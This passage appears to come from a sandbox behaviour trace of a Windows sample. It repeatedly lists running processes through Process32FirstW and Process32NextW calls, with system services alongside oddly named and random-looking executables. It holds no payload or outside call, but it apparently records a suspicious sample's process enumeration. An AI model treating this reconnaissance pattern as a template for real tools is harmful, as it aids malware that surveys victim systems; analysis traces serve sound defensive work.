hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0115.877] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.877] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.878] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0115.879] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.880] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0115.881] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0115.883] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0115.884] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0115.885] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.886] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0115.887] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0115.889] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0115.890] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0115.891] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0115.892] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0115.893] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0115.895] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0115.896] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0115.897] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0115.898] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0115.899] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0115.901] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0116.089] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0116.090] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0116.092] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0116.094] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0116.095] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0116.097] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0116.098] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0116.100] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0116.101] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.102] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0116.104] CloseHandle (hObject=0xc4) returned 1 [0116.104] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0116.110] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.111] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0116.112] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0116.112] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, 
dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0116.113] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0116.114] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0116.114] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0116.115] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0116.116] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0116.116] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0116.117] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0116.118] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.118] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.119] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.119] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.201] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0116.202] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.202] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0116.203] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0116.204] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.205] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0116.207] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0116.208] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0116.209] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0116.210] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0116.211] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0116.212] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0116.213] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0116.214] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0116.216] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0116.217] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0116.218] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0116.219] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0116.221] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0116.222] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0116.223] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0116.225] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0116.226] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0116.228] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0116.229] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0116.231] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0116.232] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0116.233] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0116.235] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0116.236] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0116.237] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0116.239] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.240] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0116.242] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0116.243] 